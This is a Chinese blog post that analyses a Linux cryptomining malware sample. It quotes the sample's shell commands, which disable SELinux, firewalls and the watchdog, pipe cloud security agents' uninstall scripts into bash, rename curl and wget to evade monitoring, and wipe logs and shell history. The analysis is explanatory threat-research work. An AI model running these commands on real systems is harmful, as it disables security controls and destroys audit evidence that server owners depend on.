恶意样本分析

  • 内容
  • 相关

前言

前几天喜提一个linux的恶意挖矿样本,有点意思。今天就水一篇文章,看看当代黑产都怎么控制服务器的。

1.一键破防

1.1关闭selinux

#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null   #关闭selinux(理解为Linux的安全模块)

1.2关闭防火墙

ufw disable  #关闭防火墙
iptables -F  #清除防火墙配置
#sudo sysctl kernel.nmi_watchdog=0

1.3关闭看门狗

echo '0' >/proc/sys/kernel/nmi_watchdog #关闭linux 看门狗
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf   #重启自动关闭

1.4关闭阿里云防御

if ps aux | grep -i '[a]liyun'; then
  $bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash      #屏蔽阿里云监控
  $bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  $bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash
  $bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service  
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service   
  systemctl disable aliyun.service

1.5 关闭卸载百度云防御

service bcm-agent stop  
  yum remove bcm-agent -y
  apt-get remove bcm-agent -

1.6关闭腾讯云

elif ps aux | grep -i '[y]unjing'; then #屏蔽腾讯云镜
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi

2.致盲

2.1迷惑行为,更改关键函数命名,防止未知监控(应该用处大)

mv /usr/bin/curl /usr/bin/url
mv /usr/bin/url /usr/bin/cdt
mv /usr/bin/cdl /usr/bin/cdt  #curl=cdt
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/get /usr/bin/wdt
mv /usr/bin/wdl /usr/bin/wdt  #wget=wdt

2.2文件保护及删除日志

ulimit -n 65535    #取消文件访问个数限制
rm -rf /var/log/syslog  #删除日志(操作比较糙,而且删得不够)
chattr -iua /tmp/    #为防止原有文件被误删或者改变
chattr -iua /var/tmp/ #为防止原有文件被误删或者改变
history -c             #删除日志(操作比较糙,而且删得不够)
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history

3.开启性能模式

sync && echo 3 >/proc/sys/vm/drop_caches  #释放内存
ulimit -n 65535    #取消文件访问个数限制
echo 128 > /proc/sys/vm/nr_hugepages #默认为0
sysctl -w vm.nr_hugepages=128  #开启性能模式 初步认定为挖矿

4.后门留存

常规知识没啥好说的


本文标签:

收录状态:百度√[百度已收录]丨360√[360已收录]丨搜狗√[搜狗已收录]

版权声明:若无特殊注明,本文皆为《Mracat》原创,转载请保留文章出处。

本文链接:恶意样本分析 - https://mracat.com/315.html

本文短域名链接:

用手机扫描访问本文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

请勿乱用他人邮箱,否者您将收不到最新动态消息~